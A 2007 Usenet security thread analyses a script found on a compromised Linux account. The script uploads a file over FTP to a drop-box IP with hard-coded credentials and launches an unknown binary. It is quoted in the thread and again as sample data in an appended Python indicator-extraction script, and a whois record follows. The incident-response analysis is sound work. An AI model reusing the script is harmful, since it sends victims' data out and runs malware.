Re: Phishing Attempt



On Tue, 02 Oct 2007 14:46:04 -0500:

On Tue, 02 Oct 2007, in the Usenet newsgroup comp.os.linux.security, in article
<47024555$0$15142$afc38c87@xxxxxxxxxxxxxxxxxxxx>, Mark wrote:

Mark wrote:

The account home directory contained a simple shell script of just over
a dozen lines. I can't see what it's doing there.

OK below is the text of the script as it was sent back to me.

Confusion - above you say the script was in the home directory, while
here, you say it was sent back to you. WTF?

I can normally understand shell scripts, but I can't see what this one
is doing.

Your Linux box may only have a soft link from /usr/share/man/man1/sh.1
to something else - probably /usr/share/man/man1/bash.1 - you can follow
that to see what it's doing.

[useless empty lines deleted]

#!/bin/sh
HOST=3D'58.105.225.59'

That sets the variable 'HOST' to the IP address you are posting from.
The '=3D' is a mime abortion which actually translates to an equal sign.

USER=3D'test'
PASSWD=3D'testing'
FILE=3D'1.db'

Setting three more variables - what are the contents of file "1.db" in
this home directory?

=20

More mime crap - actually a space character

ftp -n $HOST <<END_SCRIPT
quote USER $USER
quote PASS $PASSWD
put $FILE
quit
END_SCRIPT

run the ftp command, connecting to the ftp server on 58.105.225.59,
logging in as user test with password testing, and uploading the file
'1.db' from the current directory on the host this script is run from,
and then quitting.

sleep 70
./pula &

Sleep for 70 seconds, and then run the application 'pula' which is also
in the current directory, putting that application into the background.

'pula' is a city in Croatia (14E/45N), the currency of Botswana (where
it apparently means "rain"), and seems to be some form of windoze worm
or virus that may have originated in Indonesia. I hadn't heard of it
affecting Linux before, and it doesn't show up in the list of malware
searched for in the windoze-wannabe "tools" chkrootkit or rkhunter.
Perhaps you should be looking at that file - starting with the command

file ./pula

if you haven't wiped the directory already.

exit 0

That's the end of the script. Not knowing what's in the 'pula' file,
it's not possible to say what's going on, but this thing you quoted
seems to be running the 'pula' file, sleeping for 70 seconds. It's
also ftp'ing a file named '1.db' to the ftp account 'test' on the host
58.105.225.59. Did you look to see what is in there?

Actually, this looks more as if the host 58.105.225.59 is/was being used
as a 'drop-box', and you may find it useful searching that system to see
where the files are going. It _could_ be that another computer elsewhere
was connecting to the ftp server on 58.105.225.59 using the same account
name/password, and 'get'ing (and perhaps removing) the file, in which
case the only evidence might be in the (non-existent) ftp server logs.

Old guy


This guy is probably unaware and his box has been hacked to be a relay:

% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 58.104.0.0 - 58.111.255.255
netname: OPTUSINTERNET-AU
descr: OPTUS INTERNET - RETAIL
descr: INTERNET SERVICES
descr: Chatswood, Sydney
country: AU
admin-c: OI3-AP
tech-c: OI3-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-AU-OPTUSINTERNET
status: ALLOCATED PORTABLE
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@xxxxxxxxx 20050422
changed: hm-changed@xxxxxxxxx 20061110
source: APNIC

role: Optus Internet
address: Level 3, 11 Help Street
address: Chatswood, NSW 2067
country: AU
phone: +61-2-9027-1127
fax-no: +61-2-9027-1035
e-mail: oie-netops@xxxxxxxxxxxx
trouble: Send spam/abuse reports to abuse@xxxxxxxxxxxxxxx
admin-c: OI1-AP
tech-c: OI1-AP
nic-hdl: OI3-AP
notify: oie-netops@xxxxxxxxxxxx
mnt-by: MAINT-AU-OPTUSINTERNET
changed: oie-netops@xxxxxxxxxxxx 20040502
changed: hm-changed@xxxxxxxxx 20041020
changed: hm-changed@xxxxxxxxx 20041020
source: APNIC

--
Posted via a free Usenet account from http://www.teranews.com
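The walk-through above does two things by hand: it undoes the quoted-printable mangling (`=3D`, `=20`) that the news transport applied, and then reads the script for the things a responder cares about (where it connects, what credentials it carries, what it uploads, what it launches). The following Python script is an added example, not code from the thread; it automates both steps over a constructed sample modelled on the quoted script, and the function and variable names are mine.

```python
import quopri
import re

# Constructed sample, modelled on the script quoted in the thread. It still
# carries the quoted-printable transport encoding (=3D for '=', =20 for a
# space) that the mail/news software applied in transit.
RAW_SCRIPT = b"""#!/bin/sh
HOST=3D'58.105.225.59'
USER=3D'test'
PASSWD=3D'testing'
FILE=3D'1.db'
=20
ftp -n $HOST <<END_SCRIPT
quote USER $USER
quote PASS $PASSWD
put $FILE
quit
END_SCRIPT
sleep 70
./pula &
exit 0
"""

# NAME='value', NAME="value" or NAME=value on a line of its own
_ASSIGN = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)=(?:'([^']*)'|\"([^\"]*)\"|(\S*))\s*$")
# $NAME or ${NAME}
_VARREF = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")


def decode_qp(raw: bytes) -> str:
    """Undo quoted-printable so '=3D' reads as '=' and '=20' as a space."""
    return quopri.decodestring(raw).decode("utf-8", errors="replace")


def extract_indicators(script: str) -> dict:
    """Static triage of a decoded shell script.

    Returns the variables it assigns, every host it opens an ftp session
    to, the credentials sent with 'quote USER'/'quote PASS', the files it
    'put's, the commands it backgrounds with '&', and any sleeps. $VAR
    references are resolved from the script's own assignments so the
    report shows concrete values rather than variable names.
    """
    variables = {}
    for line in script.splitlines():
        m = _ASSIGN.match(line.strip())
        if m:
            variables[m.group(1)] = next(g for g in m.groups()[1:] if g is not None)

    def expand(token: str) -> str:
        return _VARREF.sub(lambda mm: variables.get(mm.group(1), mm.group(0)), token)

    report = {"variables": variables, "ftp_hosts": [], "ftp_logins": [],
              "uploads": [], "background": [], "sleeps": []}
    pending_user = None
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if m := re.match(r"^ftp\s+(?:-\S+\s+)*(\S+)", line):
            report["ftp_hosts"].append(expand(m.group(1)))
        elif m := re.match(r"^quote\s+USER\s+(\S+)", line, re.I):
            pending_user = expand(m.group(1))
        elif m := re.match(r"^quote\s+PASS\s+(\S+)", line, re.I):
            report["ftp_logins"].append((pending_user, expand(m.group(1))))
            pending_user = None
        elif m := re.match(r"^put\s+(\S+)", line):
            report["uploads"].append(expand(m.group(1)))
        elif m := re.match(r"^sleep\s+(\d+)", line):
            report["sleeps"].append(int(m.group(1)))
        elif line.endswith("&"):
            report["background"].append(line[:-1].strip())
    return report


def summarize(report: dict) -> list:
    """Turn the indicator dict into one-line findings a responder can act on."""
    findings = []
    for host in report["ftp_hosts"]:
        findings.append(f"outbound FTP session to {host}")
    for user, pw in report["ftp_logins"]:
        findings.append(f"hard-coded FTP credentials: user={user!r} pass={pw!r}")
    for path in report["uploads"]:
        findings.append(f"uploads local file {path!r} (possible exfiltration; inspect it)")
    for cmd in report["background"]:
        findings.append(f"backgrounds {cmd!r} (run 'file' on it before trusting it)")
    return findings


if __name__ == "__main__":
    decoded = decode_qp(RAW_SCRIPT)
    for finding in summarize(extract_indicators(decoded)):
        print(finding)
```

The point of resolving `$HOST` and friends from the script's own assignments is that the indicators (drop-box address, account name, file name) come out as values you can search logs and firewall records for, which is what the "Old guy" reply recommends doing; the script also flags the backgrounded `./pula` as the file to run `file` on next.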
